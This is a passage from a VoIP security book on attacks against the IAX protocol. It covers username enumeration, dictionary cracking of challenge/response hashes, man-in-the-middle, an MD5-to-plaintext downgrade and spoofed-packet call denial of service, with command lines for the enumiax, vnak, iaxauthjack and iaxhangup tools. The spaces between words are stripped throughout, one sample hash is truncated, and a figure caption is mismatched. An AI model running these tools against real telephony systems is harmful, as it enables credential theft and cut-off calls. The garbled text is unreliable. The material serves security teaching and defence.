onMD5hashes.Thismethodprotectsagainsttheuseofcleartextpasswordsoverthenetworkaswellasreplayattacks.However,theauthenticationschemeisvulnerabletocommonauthenticationattacks,includingdictionaryattacks.Theprotocolalsorequiresstorageoftheactualpasswordasthepasswordverifier,[5]increasingthelikelihoodofaservercompromise.Ingeneral,MD5allowsanyweakorstrongpasswordtobehashedwithoutsendingthepasswordoverthenetworkincleartext.Forexample,ifanendpointweretousethepasswordSonia,whichisaweakpasswordbecauseithasonlyfivecharactersandnonumbers,theMD5hashthatwouldbeusedisCCD5614CD5313D6091A96CE27C38EB22.WhilecreatinganMD5hashensuresthatthepasswordisnotsentoverthenetworkincleartext,itexposesanotherproblem,whichistheuseofpassword-equivalentvalues.Password-equivalentvaluescreatetwopotentialsecurityrisks.First,theMD5hashvalueofSoniaisalwaysthesame,makingitvulnerabletoareplayattack.AnattackercouldsimplysnifftheMD5hashoverthenetworkanduseitlatertobeauthenticated.Theattackerdoesnotneedtoknowwhattherealpasswordis,becausetheMD5hash(thepassword-equivalentvalue)iswhatissenttotheauthenticatingdevice.Second,tospeeduptheprocess,theattackercouldsimplycreateanMD5hashforeverywordinthedictionary(apre-computed,brute-forceattack)andsendthosevaluestotheauthenticatingdevice.Whiletheattackerwouldnotknowthecorrectpassword,eventuallyshewouldsendanMD5hashthatmatchesahashforacorrectpassword.Inordertopreventreplayattacks,IAXsupportsthechallenge/responsemethod.ThismeansthatIAX'sMD5authenticationdoesnotrequiretheuseofapasswordorapassword-equivalentvalue.Instead,anauthenticator,suchasanAsteriskserver,sendsachallengetotheendpointforeachuniqueauthenticationrequest.Forexample,ifanIAXendpointtriedtoauthenticatefivedifferenttimes,itwouldbegivenone

challengeforeachofthefiveauthenticationattempts.Oncetheendpointreceivesthechallengefromtheauthenticator,theendpointconcatenatesthechallengewithitspasswordandcreatesanMD5hashofthecombinedvalues.ThisMD5hashissentoverthenetworktotheauthenticatingdeviceforcomparison.Theauthenticatingdevice,alsoknowingthechallengeandpassword,willcomparethehashreceivedagainstanMD5hashbasedonwhatitexpectstoreceive.IftheMD5hashgeneratedbytheauthenticatormatchestheMD5hashsentoverthenetworkbytheendpoint,thentheauthenticatorknowsthatthecorrectpasswordwasusedbytheendpoint.IftheMD5hashsentoverthenetworkbytheendpointdoesnotmatchtheonecreatedinternallybytheauthenticatingdevice,thentheauthenticatorknowsthatthecorrectpasswordwasnotused(andtheendpointisnotsuccessfullyauthenticated).Figure5-1showsanexampleoftheIAXauthenticationprocess.It'simportanttounderstandthatthechallenge/responsemethoddefendsagainstreplayattacksbyusinguniquechallengesforeveryauthenticationrequest.Anattackerwhosniffstheauthenticationprocessofanendpointcannotreplayavalidresponse,asthechallengeusedtocreatethehashisvalidforthatuniqueauthenticationrequestonly.TheattackerwouldbetryingtoreplayanMD5hashthatwascreatedwithanoldchallengetiedtoanothersession,whichisthereforeuseless.

Figure5-1.IAXauthentication

[2]AllreferencestoIAXrefertoIAX2.[3]ClientendpointisdefinedasanysoftorhardphonethatsupportstheIAXprotocol.[4]See(http://tools.ietf.org/id/draft-guy-iax-03.txt/).[5]Passwordverifiersarethedatathatmustbestoredinordertoauthenticateapeer.Ideally,passwordverifiersarenotpasswordsorpasswordequivalents.

IAXSecurityAttacksNowthatweknowthebasicsoftheIAXprotocolanditsuseinauthentication,let'sdiscusssomeofthemanysecurityattacks.Inthissection,wewilldiscussthefollowingVoIPattacksondevicesusingIAXforsessionsetupandmediacommunication:

UsernameenumerationOfflinedictionaryattack(IAX.Brute)ActivedictionaryattackMan-in-the-middleattackMD5-to-plaintextdowngradeattack(IAXAuthJack)DenialofServiceattacks

RegistrationRejectCallRejectHangUPHold/Quelch(IAXHangup)

UsernameEnumeration

IAXusernamescanbeenumerated,inamannersimilartotheprocessdescribedinChapter3fortheH.323protocol.UsernameenumerationofvalidIAXuserscanbecompletedusingtheenumIAXtoolwrittenbyDustinD.Trammel.WhenauthenticationisrequiredbetweenanIAXclientandanAsteriskserver,theIAXclientsendsitsusernameandpassword,asindicatedinthearchitecturedepictedinFigure5-1.Inordertoenumeratetheusername,enumIAXcanuseeithersequentialusernameguessingoradictionaryattack.Sequentialusernameguessingcreatesusernamesbasedonalphanumericcharacters(lettersathroughzandnumbers0through9),thoughthesecanbeupdatedinthecharmap.hfile.In

contrast,thedictionaryattackusesalistofdictionarywordsfromthedictfileratherthantryingtoauto-constructthem.Asyoureadthischapter,youwillseejusthoweasilytheusernamecanbeobtained.CompletethefollowingexercisetoenumerateIAXusernames:

1. StartNemesisfromtheBackTrackLiveCD.2. WhilebootedtotheBackTrackLiveCD,download

enumIAXfromhttp://sourceforge.net/project/showfiles.php?group_id=181899/.

3. InstallenumIAXwiththefollowingsteps:tarzxvfenumiax-1.0.tar.gz

cdenumiax-1.0

make

makeinstall

cd/usr/local/bin

4. Attheshellprompt,usethefollowingsyntaxtostartenumIAXundersequentialmode,attemptingusernamesthathavebetweenfourandeightcharacters:

enumiaxtarget-ip-address-m4-M8-v(e.g.,enumiax172.16.1.100-m4-M8-v)

5. Next,useenumIAXunderdictionarymodebyusingthefollowingsyntaxattheshellprompt:[6]

enumiaxtarget-ip-address-ddict-v(e.g.,enumiax172.16.1.100-ddict-v)

OfflineDictionaryAttack

AlthoughtheIAXMD5authenticationmethodpreventspasswordsfrombeingexposedincleartextandevenpreventsreplayattacks,itisstillvulnerabletosomecommonauthenticationattacks.Inparticular,anofflinedictionaryattackpresentstheriskofcompromisedsecurityifthesystemusesweakpasswords.

Figure5-1depictedtheAsteriskserversendingachallengeoverthenetworktotheIAXendpoint.Thischallengeisusedincreatingtheendpoint'sMD5authenticationresponse,whichisalsosentoverthenetwork.Becausethechallengeandtheresponsearebothtransmittedincleartext,theyarereadilyavailabletoapassiveadversarywhomightbelisteningonthenetwork.Thus,whilethechallenge/responsemethodensuresthattheauthenticationhashisnotusefulfordirectreplay,thehashcouldstillbeusedinconjunctionwiththechallengetoinferthepassword.Unlikeanonlinebrute-forceattack,whereinanattackerattemptstoauthenticatetotheserverbyrepeatedlyusingguessedpasswords,anofflinedictionaryattackallowsanattackertocheckpasswordscomputationallyonhisownsystem.CheckingformatchingMD5hasheswithoutaccessingthetargetedsystemisnotonlyquicker,italsomitigatestheriskoflockoutafteracertainnumberoffailedattempts.Hereishowitworks.Ifapersonwhoknewhowtocount,butnothowtoadd,wantedtosolvetheproblemof8+x=15,shewouldneedonly7attempts(1through7)beforebrute-forcingthecorrectanswer.Thesameideaappliestoanofflinedictionaryattack.Ifanattackerknowsthechallengesentbyaserveris214484840andtheresultingMD5hashisfc7131a20c49c3d96ba3e2e27d27,shecantestanygivenpasswordbyconcatenatingthepasswordwiththechallengeandcomputingtheMD5.Iftheresultisequaltothehashtheattackersniffedoverthenetwork,theattackerhasguessedthecorrectpassword.SeeFiguresFigure5-2andFigure5-3formoredetails.

Figure5-2.Offlinedictionaryattack

NoticethelastrowinFigure5-3,wherethegeneratedMD5hashmatchesthesniffedMD5hashcapturedoverthenetwork.Thisinformationallowstheattackertoverifythatshehasidentifiedthecorrectpassword,whichis123voiptest.Furthermore,unlikeotherpasswordattacks,theattackerneedstocaptureachallengeandMD5hashonlyoncetocarryouttheattack.ThechallengewillalwaysbevalidfortheMD5hashsniffedoverthenetwork,givingtheattackeralltheinformationrequiredtoperformapassiveattack.

Figure5-3.Detailsoftheofflinedictionaryattack

Toillustratehowapassivedictionaryattackworks,Ihavereleasedaproof-of-concepttoolcalledIAX.Brute.IAX.Bruteisapassivedictionaryattacktoolforimplementingthechallenge/responseauthenticationmethodsupportedinVoIPIAXimplementations.Usingadictionaryfileof280,000words,aninterceptedchallenge,andavalidcorrespondinghash,IAX.Brutecanidentifymostpasswordsinlessthanoneminute.(IAX.Brutecanbedownloadedfromhttp://www.isecpartners.com/tools.html/.)Tobegin,IAX.BruterequirestheusertosniffthechallengeandtheMD5hashbetweentwoIAXendpoints.Thisprocessisaneasytask,becausebotharetransmittedoverthenetworkincleartext.Oncetheuserhascapturedthisinformation,IAX.Bruterevealsthepasswordbycheckingagainstanydictionaryfilesuppliedbytheuser.(IAX.Bruteincludesastandarddictionaryfilewithmorethan280,000commonpasswords.)Duringthisprocess,IAX.BrutecreatesanMD5hashfromtheuser-suppliedchallengeandawordinthedictionaryfile.OncetheMD5hashgeneratedbythetoolmatchestheMD5hashsniffedoverthenetwork,theuserhassuccessfullycompromisedtheIAXendpoint'spassword.SeeFiguresFigure5-4throughFigure5-6asexamples.

Figure5-4.Thechallenge(214484840)andusername(voiptest1)sniffedoverthenetworkincleartext

Figure5-5.TheMD5hashsniffedoverthenetworkincleartext

Figure5-6.IAX.Brutecompromisingthepassword123voiptest

NoticeinFigure5-6thatIAX.Brutesimplywalksthroughfourstepstoidentifythepassword:

1. IAX.Bruteloadsitsdictionaryfile.You'llfindisec.dict.txtincludedwiththetool,butanydictionaryfilecanbeused.

2. Usersuppliesthechallenge,whichinthiscaseis214484840.

3. UsersuppliestheMD5hashthatwassniffedoverthenetwork.FromFigure5-5weseethatthehashisfc7131a20c49c3d96bf69ba3e2e27d27.

4. IAX.Bruteperformsthepassivedictionaryattackand,usingtheseexamples,identifiesthepasswordas123voiptest.

ActiveDictionaryAttack

Inadditiontopassiveattacks,IAXisalsovulnerabletopre-computeddictionaryattacks.Pre-computedattacksrequiretheattackertotakeasinglechallengeandconcatenateitwithalistofpasswordstocreatealonglistofMD5hashes.Oncealistofpre-computedhasheshasbeencreated,theattackertakesthesamechallengethatwasusedtocreateallthehashes

andissuesittoanIAXclientendpoint.Inorderfortheattacktowork,thevictimmustalreadyhavesentanauthenticationrequestpackettotheAsteriskserver.TheattackerthenspoofstheresponsebyusingtheIPaddressoftheAsteriskserver,thensendsapacketusingherownchallengebeforetherealchallengepacketfromtheAsteriskserverreachestheclient.Additionally,toensurethattheattacker'sspoofedpacket(usingthesourceIPoftheAsteriskserver)reachesthevictimfirst,theattackercancreateapacketinwhichthesequenceinformationislowenoughforthevictimtoassumeitshouldbeprocessedbeforeanyotherchallengepacketwithahighersequencenumber.Thiswillguaranteethattheattacker'schallengewillbeusedbytheendpointtocreatetheMD5authenticationhash.Whentheendpointreceivesthechallengefromtheattacker,itwillrespondwithanMD5hashderivedfromtheattacker'schallengeanditsownpassword.Tocompletetheattack,theattackersimplymatchesthehashsentbytheendpointtoapre-computedhashcreatedbytheattacker.Oncetheattackerfindsamatch,thepasswordhasbeencompromised.Awaytocarryoutthisattackistoconcatenate101320040witheverywordintheEnglishdictionary,whichwouldcreatealistofpre-computedhashes.Oncethelisthasbeencreated,theonlysteptheattackerneedstocompleteistosendapackettotheendpointwiththechallengeof101320040.Whentheendpointreceivesthechallenge,itwillsendtheMD5hashoverthenetwork.Theattackercansimplysnifftheresponseandcompareitwiththepre-computedlist.Onceoneofthepre-computedMD5hasheshasbeenmatchedtothehashcapturedfromthetarget,theattackerknowsthepassword.Figure5-7showsanexampleofthepre-computedattackusingactivepacketinjection.

Figure5-7.Pre-computeddictionaryattack

NoticeinFigure5-7thattheattackerhascreatedalistofpre-computedhashesbasedonthechallengeof101320040(shownatthelowerleft).Whentheattackerinjectsthatchallengeduringtheendpoint'sauthenticationprocess,theclientcreatesanMD5hashusingtheattacker'schallenge.Unlikethepassivedictionaryattack,whereintheattackerneedstobrute-forcethepassword,oncetheattackersniffstheMD5hashoverthenetwork,shecansimplymatchthesniffedMD5hashtooneofthepre-computedMD5hashes.Ifamatchappears,theattackerhasjustobtainedtheendpoint'spassword.Inordertodemonstratethisissue,theco-authorofthischapter(ZaneLackey)haswrittenatoolinPythoncalledvnak(downloadablefromhttp://www.isecpartners.com/tools.html/).Vnakisatoolthatcanperformmanyattacks,includingapre-computeddictionaryattack(usingoption1).VnakwillforceavulnerableendpointtocreateanMD5authenticationhashusingachallengesentbyanattackerinsteadofalegitimate

server.

Targetedattack

Totestvnakintargetedattackmode,youcanusetheexamplecommandshownhere:

pythonvnak.py-e-a1ServerIP

Usingthissyntax,vnaksendsapre-computedchallengetoitstarget.Thetargetthenreceivesthepre-computedchallenge,combinesitwithitspassword,andsendstheresultingMD5hashbackoverthenetwork.Theattackerthenviewsthishashoverthenetworkandusesittocarryoutadictionaryattack.ThedictionaryattackisgreatlyimprovedovertheofflineattackbecausetheattackeralreadyhasalistofMD5hashesthathavebeencreatedwiththepre-computedchallengeandvariouspasswords.Itshouldbenotedthatvnakcanperformmanyotherattacksdescribedinthischapterandotherchapters,usingthefollowingflags:

Option0 IAX Authenticationdowngrade

Option1 IAX Knownauthenticationchallenge

Option2 IAX Callhangup

Option3 IAX Callhold/quelch

Option4 IAX Registrationreject

Option5 H.323 Registrationreject

Option6 SIP Registrationreject

Option7 SIP Callreject

Option8 SIP Knownauthenticationchallenge

IAXMan-in-the-MiddleAttack

Inadditiontoactiveattacks,IAX'ssupportofthechallenge/responseauthenticationmethodmakesitvulnerabletoman-in-the-middleattacks.ThisattackfirstrequiresaccesstothenetworktrafficbetweentheendpointandtheAsteriskserver,whichcanoftenbeobtainedviaARPcachepoisoningorDNSspoofingtechniques.OnceanattackerisroutingtrafficbetweenalegitimateendpointandtheAsteriskserver,hehasprivilegedaccesstothedatabetweenthem.TheattackercanthenauthenticatetotheAsteriskserverwithoutknowingavalidusernameandpassword.Duringanattack,themalicioususermonitorsthenetworktoidentifywhenanIAXendpointsendsanauthenticationrequesttotheAsteriskserver.Whentheauthenticationrequestoccurs,theattackerinterceptsthepacketsandpreventsthemfromreachingtherealAsteriskserver.TheattackerthensendshisownauthenticationrequesttotheAsteriskserver.Usingthechallenge/responsemethodforauthentication,theAsteriskserversendsachallengetotheattacker.Theattackerreceivesthechallengeandsendsitalongtothelegitimateendpoint,whichisstillwaitingtoauthenticatefromthefirststep.ThelegitimateendpointthensendsavalidMD5hashtotheattacker(derivedfromtherealpasswordandAsterisk'schallenge),thinkingtheattackeristheactualAsteriskserver.OncetheattackerhasthevalidMD5hashfromthelegitimateendpoint,hesendsthehashtotheAsteriskserverandsuccessfullyauthenticates.SeeFigure5-8fordetails.

Figure5-8.IAXman-in-the-middleattack

Theman-in-the-middleattacksignificantlyincreasestheattacksurfaceonIAXimplementations,allowinganattackertoauthenticatetotheAsteriskserverwithoutbrute-forcingasingleusernameandpassword.Formoredetailedinformationonperformingaman-in-the-middleattack,seeChapter2forstep-by-stepinstructionsonusingCain&Abel.

MD5-to-PlaintextDowngradeAttack

TheIAXprotocolspecificationassumesthatimportantsecurityprotectionsaregoingtobehandledatothernetworklayers,leavingimplementationspotentiallyvulnerabletoactiveattacks.ThissusceptibilitytoactiveattacksarisesfromthefactthattheIAXprotocoldoesnotprovideintegrityprotection.IntegrityprotectionensuresthatthecommunicationoccurringbetweentherealAsteriskserverandendpointhasnotbeentamperedwithonthewireorhasbeensentfromarogueserverorclient.AnothermajorissueisthepredictabilityofIAXcontrolframesequencing.Forexample,amajorityofthesequencenumbersusedaremerelyincrementedbyoneineachframe.Thisallowsanattackertoeasilypredictthevaluesthatareneededfor

injectingspoofedpackets.ThecombinationoftheseissuesmeansthatvulnerableIAXimplementationscanbedowngradedtoplaintexttransmissionsduringtheauthenticationprocess.Thedowngradeattackcausesanendpoint,whichwouldnormallyuseanMD5digestforauthentication,tosenditspasswordincleartext.Inordertoperformthisattack,theattackermustcompleteafewsteps.First,theattackerneedstosniffthenetwork,[7]watchingforanendpointattemptingtoregistertotheAsteriskserver(AS)usingaregistrationrequest(REGREQ)packet.TheattackerthenparsesouttherequiredvaluesfromtheREGREQpacket,includingtheDestinationCallID(DCID),OutboundSequenceNumber(oseq),InboundSequenceNumber(iseq),usernamelength,andusername.Oncetheinformationhasbeengathered,theattackerneedstoincreasetheiseqvaluetocorrespondtotheexistingsessionoriginallycreatedbytheAS(makingitvalidforaspoofedREGAUTHpacket).Afterthesequenceinformationisincreasedappropriately,theattackerinjectsaspoofedREGAUTHpacketspecifyingthatonlyplaintextauthenticationisallowed.Ifthespoofedpacket"winstherace"backtotheendpoint(aheadoftheAS'srealpacketthatrequiresMD5authentication),theendpointsendsanotherREGREQpacketacrossthenetworkwiththepasswordinplaintext.ThisallowstheattackertorecoverthepasswordfromthenetworkwithastandardsniffersuchasWireshark.[8]SeeFigure5-9foranexample.

Figure5-9.Downgradeattack

Figure5-9showsanendpointattemptingtoregisterwiththeAsteriskserver.Duringtheauthenticationprocess,theattackerextractstherequiredsessioninformationfromthispacket.Oncetheinformationhasbeenobtained,theattackerinjectsaREGAUTHpacketspoofedfromtheAsteriskserverspecifyingthatonlyplaintextauthenticationisallowed.Whentheendpointreceivesthispacket,itrespondswithanotherREGREQwiththepasswordinplaintext(inFigure5-9,thesamplepassword123voiptestisshown).Becausethispasswordissentinplaintext,itcanbeeasilysniffedbyanattacker.Inordertodemonstratethisissue,theco-authorofthischapter(ZaneLackey)haswrittenatoolinPythoncalledIAXAuthJack(downloadablefromhttp://www.isecpartners.com/tools.html/).IAXAuthJackisatoolthatactivelyperformsanauthenticationdowngradeattack,forcingavulnerableendpointtorevealitspasswordinplaintextoverthenetwork.Toachievethis,IAXAuthJacksniffsthenetworkfortrafficindicatingthatregistrationistakingplacebetweentwoIAXendpoints.Oncearegistrationpackethasbeenrecognized,thetooltheninjectsaREGAUTHpacket,whichspecifiesthattheendpointshouldauthenticateinplaintextratherthanMD5orRSA.Thetoolhastwomodesofoperation,whicharedescribedhere.

Targetedattack-id001

TotestIAXAuthJackintargetedattackmode,youcanusethefollowingexamplecommand:

iaxauthjack.py-ieth0-cEndpointIP-sServerIP

Usingthissyntax,IAXAuthJacklistensontheeth0EthernetinterfaceforcontrolframesfromaspecificIAXendpointwhoseIPaddressisspecifiedbythe-cargument.TheServerIPvalueintheprevioussyntaxistheendpointthatisattemptingtoregisterwiththeserver,whoseIPaddressisspecifiedbythe-sargument.IAXAuthJack.pytheninjectsthespoofedREGAUTHpacketbetweentheserverandtheendpoint,causingtheendpointtorespondwithaREGREQpacketwiththepasswordinplaintext.

Wildcardattack

Bycontrast,youcantestIAXAuthJackinwildcardattackmodewiththiscommand:

iaxauthjack.py-ieth0-a-sServerIP

Inthisexample,IAXAuthJacklistensontheeth0interfaceforcontrolframesfromanyIAXendpointthatisattemptingtoregisterwiththeserver.IttheninjectsthespoofedREGAUTHpacket,causingtheendpointtorespondwithitspasswordinplaintext.SeeFigure5-10formoredetails.

Figure5-10.ThepasswordinplaintextintheMD5challengeresultfiledinWireshark

DenialofServiceAttacks

ADenialofServiceattacktargetstheavailabilityofanendpoint,leavingitunusableorunavailableforanextendedperiodoftime.ItisworthnotingthattheconsequencesofDoSattacksdifferinseveritybetweenoneenvironmentandthenext.Forexample,aDoSattackonanNFSdaemonmaypreventendusersfromgatheringfilesoverthenetwork;however,aDoSattackonaVoIPnetworkmightpreventauserfromcalling911incaseofanemergency.WhileanytypeofDoSattackisundesirable,theseverityofaDoSattackonVoIPnetworkscanoftenbehigherbecauseofendusers'relianceonvoicecommunication.Aswithdowngradeauthenticationattacks,predictablesessioninformationandalackofintegrityprotectionopenthedoorforDenialofServiceattacksagainstIAXendpoints.Withoutthesetwofactors,anactiveattackercouldnotspoofthenecessarycontrolframes.

Warning☠

BeawarethatusingAESencryptiontoprotectthevoicetrafficofacalldoesnotpreventDoSattacks.Theseattacksarestillpossible,becausesessioninformationisstillsentincleartext.

ThefollowingsectiondiscussesafewoftheDoSattacksidentifiedintheIAXprotocol.

RegistrationReject

TheRegistrationRejectattackpreventsanendpointfromregisteringtotheAsteriskserver(AS).AnattackermonitorsthenetworkforanendpointthatisattemptingtoregisterwiththeASusingaregistrationrequest(REGREQ)packet.TheattackerthenparsesoutcertainrequiredvaluesfromtheREGREQpacket,suchastheDestinationCallID(DCID),OutboundSequenceNumber(oseq),InboundSequenceNumber(iseq),usernamelength,andusername.Oncethe

informationhasbeenextracted,theattackerincreasestheiseqvaluebytwo(e.g.,161isincreasedto163).Afterthesequenceinformationhasbeenincreasedappropriately,theattackerinjectsaspoofedRegistrationReject(REGREJ)packetfromtheAStotheendpoint.However,thisattackworksonlyiftheattacker'spacketreachesthetargetedendpointbeforetheserver'sREGAUTHpacket.Otherwise,theregistrationprocesscontinuesnormally.SeeFigure5-11foranexample.Figure5-11showsanendpointattemptingtoregistertoanAsteriskserver.Duringtheauthenticationprocess,theattackerpullstherequiredsessioninformationfromtheREGREQpacket.Oncetheinformationhasbeenobtained,theattackerinjectsaREGREJpacket,specifyingthattheauthenticationprocesshasfailed.Whentheendpointreceivesthespoofedpacket,itthinksthattheregistrationprocesshasfailedandignorestheserver'sMD5challenge.

Figure5-11.Registrationrejectattack

CallReject

Thecallrejectattackpreventscallsfrombeingaccepted.Inthisattack,theattackermonitorsthenetworkforindications,suchasNEW,ACCEPT,orRINGINGpackets,thatacalliscomingin.Theattackerthenparsesouttherequiredinformationfromoneofthesepackets,suchasSourceCallID

(SCID),DestinationCallID(DCID),InboundSequenceNumber(iseq),andOutboundSequenceNumber(oseq).Oncetheinformationhasbeenparsed,theattackermanipulatestheiseqandoseqvaluessothatthesequenceinformationwillbevalidforaspoofedREJECTpacket.Afterassemblingapacketbasedonthesevalues,theIPandMACaddressesofthecallrecipient,andtheIPandMACaddressesofthecaller,thespoofedREJECTpacketissenttothecaller.Ifthespoofedpacketreachesthecallerbeforethecallrecipient'sANSWERpacket,thecallerwillthinkthecallhasbeenrejected.Otherwise,thecallwillbeestablishedasintendedandthespoofedpacketwillbeignored.SeeFigure5-12foranexample.

Figure5-12.Callrejectattack

Figure5-12showsanattackermonitoringthenetworkforacallsetuppacket,inthiscaseRINGING,thatindicateswhenanendpointisattemptingtoplaceacall.Theattackerthenpullstherequiredsessioninformationfromthispacket,constructsaspoofedREJECTpacket,andinjectsitintothenetworktraffic.Uponreceivingthispacket,theendpointbelievesthecallhasbeenrejectedandignoresanyfurthercontrolpacketsforit.

HangUP

TheHangUPattackdisconnectscallsthatareinprogressbetweentwoendpoints.Toinitiatetheattack,theattackermonitorsthenetworkforanytrafficthatindicatesacallisinprogress,suchasanANSWERpacket,aPINGorPONGpacket,oravoicepacketwithaudio.Theattackerthenparsesoutthefollowingrequiredvaluesfromoneofthesepackets:theSourceCallID(SCID),DestinationCallID(DCID),InboundSequenceNumber(iseq),andOutboundSequenceNumber(oseq).Oncethisiscomplete,theattackermustmanipulatethesequenceofiseqandoseqvaluestocreateavalidspoofedHANGUPpacket.Finally,theattackerinjectsthespoofedHANGUPpacketwiththenowcorrectinformation,causingthecalltobedropped.SeeFigure5-13foranexample.

Figure5-13.Callhangupattack

Figure5-13showsanexistingcallbetweentwoendpoints,withmediaflowinginbothdirections.Duringaphonecall,acontrolframeissentacrossthenetwork(aPINGinFigure5-13)thatcontainsthesessioninformationneededtocompletethisattack.Fromthatinformation,aspoofedHANGUPpacketiscreatedandsenttoendpointA.OnceendpointAreceivestheinformation,theexistingphonecallisdropped.Atthattime,endpointBisunawareoftheHANGUPandcontinuessendingdata,butendpointAwillnolongerprocessthoseincoming

packets.ZaneLackey,co-authorofthischapter,hascreatedatoolinPythonnamedIAXHangup.pythatautomatesthisattack.Thetoolcanbedownloadedfromhttp://www.isecpartners.com/tools.html/.IAXHangupisatoolthatdisconnectsIAXcalls.Itfirstmonitorsthenetworkinordertodetermineifacallistakingplace.Onceacallhasbeenidentifiedandacontrolframecontainingsessioninformationhasbeenobserved,IAXHangupinjectsaHANGUPcontrolframeintothecalltoforceanendpointtodropit.Thetoolhastwomodesofoperation,whicharedescribedbelow:

Targetedattack-id002

TorunIAXHangupintargetedmode,interruptingacallbetweentwospecificendpoints,usethefollowingsyntax:

iaxhangup.py-ieth0-a1.1.1.1-b2.2.2.2

Inthisexample,thetoollistensontheeth0interfaceforcontrolframesindicatingthatacallistakingplacebetweenhosts1.1.1.1and2.2.2.2.IAXHangup.pytheninjectsaHANGUPcommandtodisconnectthecall.

Wildcardattack-id001

TorunIAXHangupinwildcardmode,whereitwilllookforcallsbetweenanyhosts,usethefollowingsyntax:

iaxhangup.py-ieth0-e

Here,thesyntaxinstructsIAXHanguptolistenontheeth0interfaceforacallbetweenanyhostsonthenetworkanddisruptthemwithHANGUPcontrolframesaccordingly.

Hold(QUELCH)

TheHoldattackisaimedatdisruptingcommunicationbetweentwoendpoints,ratherthanforciblydisconnectingtheircall.To

achievethis,theHoldattackleveragestheQUELCHcommandinIAX,whichisusedtohaltaudiotransmission.ThisattackmaybeusedinsteadofHangUPifanattackerwantstotrickacallerintothinkingthatacallisstillconnected,despitethefactthatthecallercannotbeheardbytheuserontheothersideofthecall.Theattackoccursbyplacingonesideonholdwhilenotnotifyingtheotherside.Forthisattack,theattackeragainmonitorsthenetworkforanysignsthatacallisinprogress,suchasanANSWERpacket,aPINGorPONGpacket,oraMinivoicepacket.TheattackerextractstheSourceCallID(SCID),DestinationCallID(DCID),InboundSequenceNumber(iseq),andOutboundSequenceNumber(oseq)asbeforeandmanipulatestheiseqandoseqvaluessotheywillbevalidforaspoofedHold(QUELCH)packet.Finally,theattackerinjectsthespoofedQUELCHpacket,causingonesideoftheconversationtobeplacedonholdwithouteitheroftheusers'knowledge.SeeFigure5-14foranexample.Figure5-14showsanexistingcallbetweentwoendpoints,withmediaflowinginbothdirections.Duringaphonecall,controlframesaresentacrossthenetwork(here,aPING)thatcontainimportantsessioninformationthatanattackerneedsinordertobuildavalidspoofedpacket.Withthisinformation,theattackercanspoofaQUELCHpacketandsendittoendpointA.Fromthispointforward,theconnectionisstilllivebutstrictlyone-sided.EndpointAwillnolongersendmedia(audio)toendpointB.

Figure5-14.Callrejectattack

[6]Youmayalsowishtoopenthedictfileandaddextrausernamesyouwishtobrute-force.Afewpopularoneshavealreadybeeninsertedintothefile.[7]GainingaccesstonetworktrafficonswitchednetworkisdemonstratedinChapter2withtoolslikeCain&Abel.[8]See(http://www.wireshark.org/).

SummaryIAXhasthepotentialtobeaverypopularprotocolforVoIParchitecturesbecauseofthegrowingpopularityoftheAsteriskPBXsystem.Itssimplenature,friendlinesswithnetworkfirewalls,relianceonasingleUDPport,unifiedsignalingandmediatransferprotocol,andrelativelyfewnetworkcomponents(nomediaproxies,gateways,gatekeepers,orSTUNservers)makeitveryattractive.DespitethemanyoperationalandfunctionaladvantagesoverSIPorH.323,though,itdoesnotfaremuchbetterintermsofsecurity.Infact,theauthenticationweaknessesofSIPandH.323aremirrored,andareinsomecasesworse,inIAX.Furthermore,thelackofuseand/orsupportforencryptioninmediatransfersisverysimilarbetweenIAXandRTP.FactorinthesusceptibilitytoDenialofServiceattacksandIAX,SIP,andH.323allshareasimilarvulnerabilityprofile.However,thepossiblesecuritybenefitsofIAX,aslistedinitsRFC,canbeachievedoncesupportforproperauthenticationandencryptionappearsonIAXendpointsandservers.Forexample,IAXsupportforRSApublicandprivatekeyswouldgreatlystrengthenitsauthenticationmodelagainstpassiveandactivenetworkattacks.Additionally,AESencryptionbasedonasufficientlysecure,pre-setsharedsecretcanencryptmediacommunication.Thiswouldpreventpassiveattackersfromeavesdroppingonorinjectingaudiointotelephoneconversations(aslongasthekeyisnotsentovercleartext).However,whileproperencryptionwouldpreventeavesdroppingandaudioinjection,IAXwillstillbesusceptibletoDenialofServiceattacksaslongassessioninformationremainsincleartext.EvenifencryptionisusedwithIAX,itmustcontinuetoguardagainstdesignflawsthatallowauthenticationdowngradeattacks.

PartII.VOIPSECURITYTHREATS

Chapter6.ATTACKINGVOIPINFRASTRUCTUREVoIPnetworksarevulnerabletomanyformsofcommonnetworkattacks,anddevicesthatsupportVoIPinfrastructurearealsovulnerabletosimilarissues.Inthischapter,wewilldiscussthesecurityweaknessesthataffectthefunctionalcomponentsthatmakeupaVoIPnetwork,fromdevices(hardphones,gatekeepers,registrars,andproxies)toapplications(e.g.,CiscoCallManager,AvayaCallCenter/Server,andvoicemailapplications).Specifically,youwilllearnabout:

Vendor-specificVoIPsniffingCommonhardphonevulnerabilitiesCiscoCallManagerandAvayaCallCenter/ServerattacksSecurityholesintheAvayaModularMessagingVoicemailapplicationInfrastructureserverimpersonation/redirection

AttacksongeneralnetworkservicesthatVoIPutilizes,suchasDHCPandDNS,areoutsidethescopeofthischapter;however,theseservicescanalsobeusedtocompromiseaVoIPnetwork(e.g.,rogueDHCP/DNSserversre-routingtrafficonaVoIPnetwork).Ingeneral,thischapterwillfocusonVoIPtechnologiesonly.

Vendor-SpecificVoIPSniffingSniffingVoIPnetworktrafficisnodifferentfromsniffingaregularnetwork'straffic;however,connectingtotheVoIPnetworkisoftendifferentthanconnectingtoaregularnetwork.Whilemail,DNS,andDHCPserversareaccessibleoncorporateVLANsfromuserworkstations,VoIPnetworksareusuallyondifferentVLANs.Forexample,theVoIPVLANissegmentedfromtraditionaldataprotocols,suchasanorganization'sExchangeorActiveDirectoryserver.Attackers

whoarenotconnectedtothecorrectsegmentbetweenahardphoneandtheVoIPnetworkwillnotbeabletosniffthenetworkproperly.AseparateVLANcanbeusedformanypurposes,includingsecurity,QualityofService(QoS),segmentation,orprioritylevels.KeepinmindthatVoIPpacketsshouldbeahigherprioritythandatapackets,becauseapersonusingaVoIPphoneshouldnotbeaffectedbysomeone'sdownloadingfilesfromapeer-to-peernetwork.Thenatureofvoicecommunicationdemandsreliability.ThesegmentationofVLANshelpsensurethatVoIPpacketswhichneedahigherQoSarenotaffectedbylower-prioritydatapackets.However,manyVoIPvendorswillsaythatusingseparateVLANsthatarenotdirectlyaccessiblefromuserworkstationsisasecurityprotection.Thisassertioncouldnotbefurtherfromthetruth,asgainingaccesstotheVoIPVLANisassimpleasswitchingtwonetworkcables.AnypersoncanusetheVoIPhardphonesittingonauser'sdesktogainaccesstotheVoIPVLANsimplybyunpluggingtheworkstation'sEthernetcablefromthedatanetworkandconnectingittothehardphone'sVoIPnetworkjack.However,it'simportanttopayatten